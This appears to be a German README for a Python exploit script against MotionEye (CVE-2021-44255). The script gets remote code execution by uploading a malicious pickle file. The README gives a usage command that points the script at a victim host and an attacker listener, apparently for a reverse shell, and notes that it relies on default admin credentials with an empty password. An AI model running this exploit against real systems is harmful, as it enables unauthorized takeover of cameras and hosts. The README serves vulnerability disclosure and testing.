
Ein Python 3-Skript, das eine tasks.pickle-Datei hochlädt, die RCE in MotionEye ermöglicht. CVE-2021-44255
Ein Python 3 Skript, das eine tasks.pickle-Datei hochlädt, die RCE in MotionEye ermöglicht. Sie benötigen Administrator-Anmeldeinformationen, daher sollte es keine große Sache sein. Leider sind MotionEye/MotionEyeOS häufig mit Standard-Anmeldeinformationen im Einsatz.
Beispiel:
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
Wobei Victim und Attacker im Format ip:port angegeben werden, es sei denn, es handelt sich um Port 80. Dann kann der Port weggelassen werden. Dies verwendet den Standard-Benutzernamen admin mit einem leeren Passwort. Es gibt auch CLI-Optionen für alternative Benutzernamen/Passwörter. Bitte sehen Sie sich den Code für weitere Details an.
CVE-2021-44255
Siehe https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye für eine ausführliche Beschreibung zu diesem und anderen Themen.